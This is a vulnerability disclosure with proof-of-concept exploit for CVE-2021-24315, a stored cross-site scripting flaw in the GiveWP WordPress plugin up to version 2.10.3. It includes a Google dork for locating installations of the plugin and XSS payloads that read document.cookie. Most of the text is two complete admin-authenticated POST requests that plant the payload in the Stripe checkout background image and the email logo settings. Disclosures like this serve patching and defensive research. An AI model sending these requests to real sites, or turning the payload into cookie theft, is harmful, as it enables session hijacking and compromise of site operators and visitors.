/*! - # VULNERABILITY: GiveWP WordPress Plugin <= 2.10.3 - Authenticated Persistent XSS - # GOOGLE DORK: inurl:/wp-content/plugins/give/ - # DATE: 2021-04-02 - # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ] - # VENDOR: GiveWP [ https://givewp.com ] - # SOFTWARE VERSION: <= 2.10.3 - # SOFTWARE LINK: https://wordpress.org/plugins/give/ - # CVSS: AV:N/AC:L/PR:H/UI:N/S:C - # CWE: CWE-79 - # CVE: CVE-2021-24315 */ ### -- [ Info: ] [i] An Authenticated Persistent XSS vulnerability was discovered in the GiveWP plugin through v2.10.3 for WordPress. [i] Vulnerable parameter(s): &stripe_checkout_background_image=, &email_logo=. ### -- [ Impact: ] [~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource. ### -- [ Payloads: ] [$] m0ze" autofocus onfocus=alert(document.cookie); " [$] m0ze" autofocus onfocus=alert(document.domain); " ### -- [ PoC #1 | Authenticated Persistent XSS | Background Image (Stripe Checkout): ] [!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------298112530519342307931729900289 Content-Length: 3549 Cookie: [admin cookies] -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_statement_descriptor" PoC by m0ze -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_cc_fields_format" multi -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_checkout_type" modal -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_checkout_name" PoC by m0ze -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_checkout_background_image" m0ze" autofocus onfocus=alert(document.cookie); " -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_hide_icon" enabled -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_icon_style" default -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_mandate_acceptance_option" enabled -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_mandate_acceptance_text" A refund must be claimed within 8 weeks starting from the date on which your account was debited. -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_becs_hide_icon" enabled -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_becs_icon_style" default -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_option" enabled -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="stripe_becs_mandate_acceptance_text" You certify that you are either an account holder or an authorized signatory on the account listed above. -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="_give-save-settings" 88a432b100 -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=gateways&section=stripe-settings&group=checkout -----------------------------298112530519342307931729900289 Content-Disposition: form-data; name="save" Save changes -----------------------------298112530519342307931729900289-- ### -- [ PoC #2 | Authenticated Persistent XSS | Logo (Email Settings): ] [!] POST /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type: multipart/form-data; boundary=---------------------------3829962343981723866336357850 Content-Length: 1077 Cookie: [admin cookies] -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="email_template" default -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="email_logo" m0ze" autofocus onfocus=alert(document.cookie); " -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="from_name" PoC by m0ze -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="from_email" m0ze@example.com -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="_give-save-settings" 88a432b100 -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/edit.php?post_type=give_forms&page=give-settings&tab=emails&section=email-settings -----------------------------3829962343981723866336357850 Content-Disposition: form-data; name="save" Save changes -----------------------------3829962343981723866336357850-- ### -- [ Contacts: ] [+] Website: m0ze.ru [+] GitHub: @m0ze [+] Telegram: @m0ze_ru [+] Twitter: @vladm0ze